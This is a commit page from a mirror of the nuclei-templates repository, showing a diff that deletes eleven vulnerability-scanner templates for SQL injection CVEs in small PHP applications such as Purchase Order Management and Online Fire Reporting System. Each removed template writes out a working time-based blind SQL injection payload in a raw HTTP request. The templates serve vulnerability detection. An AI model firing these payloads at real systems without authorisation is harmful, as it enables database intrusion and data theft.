daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Removed CVEs templates for miscellaneous / random / non-active projects

patch-4
sandeep 2024-06-22 22:23:27 -07:00
parent a4c09b8719
commit 28e34b09e7
11 changed files with 0 additions and 548 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

49
http/cves/2020/CVE-2020-21012.yaml
View File

@ -1,49 +0,0 @@
id: CVE-2020-21012
info:
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0.
reference:
- https://github.com/hitIer/web_test/tree/master/hotel
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-21012
cwe-id: CWE-89
epss-score: 0.07351
epss-percentile: 0.94065
cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hotel_and_lodge_booking_management_system_project
product: hotel_and_lodge_booking_management_system
tags: cve,cve2020,hotel,sqli,unauth,hotel_and_lodge_booking_management_system_project
http:
- raw:
- |
POST /forgot_password.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
btn_forgot=1&email=1%27%20or%20sleep(6)%23
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Hotel Booking System")'
condition: and
# digest: 490a0046304402206a88819f2a86877b474553fa4d72a8497496bda2b7febbd32b1d01a50895f70f0220064783fae9efeb7a0a87128c5598da4c150295bc3d5edc3c723dd92cf3bdf564:922c64590222798bb761d5b6d8e72950

55
http/cves/2020/CVE-2020-29284.yaml
View File

@ -1,55 +0,0 @@
id: CVE-2020-29284
info:
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0.
reference:
- https://www.exploit-db.com/exploits/48984
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
- https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29284
cwe-id: CWE-89
epss-score: 0.14147
epss-percentile: 0.95695
cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: multi_restaurant_table_reservation_system_project
product: multi_restaurant_table_reservation_system
tags: cve,cve2020,tablereservation,sqli,unauth,edb,multi_restaurant_table_reservation_system_project
http:
- method: GET
path:
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: word
part: body
words:
- "Restaurent Tables"
- "Chair List"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204a961e5e3dc591d1ed31952da38d3c4adda8a605b53182dd3cfaf34a4587adbd02204bc0a9fd3fd1d1cf9066837dfe68c9e2892868bd518817ec6fd744cfd35eaff1:922c64590222798bb761d5b6d8e72950

61
http/cves/2021/CVE-2021-28419.yaml
View File

@ -1,61 +0,0 @@
id: CVE-2021-28419
info:
name: SEO Panel 4.8.0 - Blind SQL Injection
author: theamanrawat
severity: high
description: |
SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
remediation: |
Upgrade to a patched version of SEO Panel or apply the necessary security patches.
reference:
- https://github.com/seopanel/Seo-Panel/issues/209
- https://www.seopanel.org/spdownload/4.8.0
- https://nvd.nist.gov/vuln/detail/CVE-2021-28419
- http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-28419
cwe-id: CWE-89
epss-score: 0.15235
epss-percentile: 0.95839
cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: seopanel
product: seo_panel
tags: cve2021,cve,sqli,seopanel,auth,packetstorm
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: _csrf={{rand_base(54,"abc")}};
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}login.php
Cookie: _csrf={{rand_base(54,"abc")}};
sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=
- |
GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1
Host: {{Hostname}}
Cookie: _csrf={{rand_base(54,"abc")}};
matchers:
- type: dsl
dsl:
- 'duration_3>=6'
- 'status_code_3 == 200'
- 'contains(body_3, "Overall Report Summary")'
condition: and
# digest: 4b0a00483046022100ebd0306427622fbd07c1768dfa8ecb58d13a80f7971106070053c48fa894595a022100cd93ac88aa8efefeabbeed69ff2de4875f337e81be596b93045772e4b1554ff7:922c64590222798bb761d5b6d8e72950

49
http/cves/2021/CVE-2021-40908.yaml
View File

@ -1,49 +0,0 @@
id: CVE-2021-40908
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-40908
cwe-id: CWE-89
epss-score: 0.0161
epss-percentile: 0.87425
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: purchase_order_management_system_project
product: purchase_order_management_system
tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project
http:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"incorrect\"")'
condition: and
# digest: 4a0a0047304502201d9682cdcb8a39247b1f2923f30931761018c186957eca58eef1294ee24c2fa9022100dd83265eb60eb8119663c8d5805b5654203d946f4cf1ee4cb28f0414ac670ca6:922c64590222798bb761d5b6d8e72950

51
http/cves/2022/CVE-2022-28022.yaml
View File

@ -1,51 +0,0 @@
id: CVE-2022-28022
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-28022
- https://github.com/ARPSyndicate/cvemon
- https://github.com/debug601/bug_report
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28022
cwe-id: CWE-89
epss-score: 0.02031
epss-percentile: 0.87755
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: purchase_order_management_system_project
product: purchase_order_management_system
tags: cve,cve2022,sqli,purchase-order-management-system,purchase_order_management_system_project
http:
- raw:
- |
POST /classes/Master.php?f=delete_item HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"success")'
condition: and
# digest: 490a0046304402207642be1d7f464fbdee2b2c77ec3ff7744acd40cd51c5d4b48b4d5a1b9eb298970220699beadc0427e71dde4e50f58c205c159cd96486d5cfb6ae26453b5c8a316cca:922c64590222798bb761d5b6d8e72950

51
http/cves/2022/CVE-2022-28023.yaml
View File

@ -1,51 +0,0 @@
id: CVE-2022-28023
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-28023
- https://github.com/ARPSyndicate/cvemon
- https://github.com/debug601/bug_report
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28023
cwe-id: CWE-89
epss-score: 0.0161
epss-percentile: 0.87425
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: purchase_order_management_system_project
product: purchase_order_management_system
tags: cve,cve2022,sqli,purchase-order,poms,purchase_order_management_system_project
http:
- raw:
- |
POST /classes/Master.php?f=delete_supplier HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"success")'
condition: and
# digest: 4b0a00483046022100c1b076f7cdfb320f0d71c0f505593b36b406e9e696bb737f0a0d61388ad61e80022100c896c24e641121b1bff83ab1240ae92d23978d4f6a153271867759af201479fb:922c64590222798bb761d5b6d8e72950

45
http/cves/2022/CVE-2022-31980.yaml
View File

@ -1,45 +0,0 @@
id: CVE-2022-31980
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31980
cwe-id: CWE-89
epss-score: 0.01429
epss-percentile: 0.85199
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Control Teams")'
condition: and
# digest: 4b0a00483046022100d3341f65cb26f4caef4623c562e9c774a42d72d1b51a42bb411f7ff44a7bf95d022100b2ee810fbeb3fca59b9907d6cdfe24246501706f3d77fa3b5e7526e32f8fc395:922c64590222798bb761d5b6d8e72950

45
http/cves/2022/CVE-2022-31981.yaml
View File

@ -1,45 +0,0 @@
id: CVE-2022-31981
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31981
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31981
cwe-id: CWE-89
epss-score: 0.01593
epss-percentile: 0.87356
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Control Teams")'
condition: and
# digest: 4a0a00473045022100d65b2d7292abe523b4dc1d6438eaab7a214662256779f7eb3c0bb76b8747d5e50220050bf41ca7a3b23c0054e85bf5aa2bf734b36b2a69ec82c38a61e68fc2d507d3:922c64590222798bb761d5b6d8e72950

45
http/cves/2022/CVE-2022-31982.yaml
View File

@ -1,45 +0,0 @@
id: CVE-2022-31982
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31982
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31982
cwe-id: CWE-89
epss-score: 0.01426
epss-percentile: 0.8625
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Request Detail")'
condition: and
# digest: 490a00463044022010dde84fca947b7396161fd4683955e87f7f25ea2671996f04fd6011e69346220220781574af1cca7ad8a241f7d8ab76479836e61236b6b46d7a4f9136cea968d23b:922c64590222798bb761d5b6d8e72950

47
http/cves/2022/CVE-2022-31983.yaml
View File

@ -1,47 +0,0 @@
id: CVE-2022-31983
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31983
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/trhacknon/Pocingit
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31983
cwe-id: CWE-89
epss-score: 0.13959
epss-percentile: 0.95665
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Request Detail")'
condition: and
# digest: 490a0046304402204af8863950057b32e9684b9023e7884d1a76824a27e8591e296376788d9565e302202866cbbcb967e8a82db30b5e44ca11175311f2f73222aa124aafe5a17f3f4069:922c64590222798bb761d5b6d8e72950

50
http/cves/2023/CVE-2023-29622.yaml
View File

@ -1,50 +0,0 @@
id: CVE-2023-29622
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-29622
- https://portswigger.net/web-security/sql-injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-29622
cwe-id: CWE-89
epss-score: 0.02992
epss-percentile: 0.90889
cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: purchase_order_management_project
product: purchase_order_management
tags: cve2023,cve,sqli,purchase-order,poms,purchase_order_management_project
http:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"incorrect")'
condition: and
# digest: 4a0a0047304502205279b241ecf32df15ffa523a7a164a86fb770d7bdac0be256ffd4930452d13f5022100d4cc576894eab1b14574b357ab4f365e85a04c865af32e12d28f03751d468c34:922c64590222798bb761d5b6d8e72950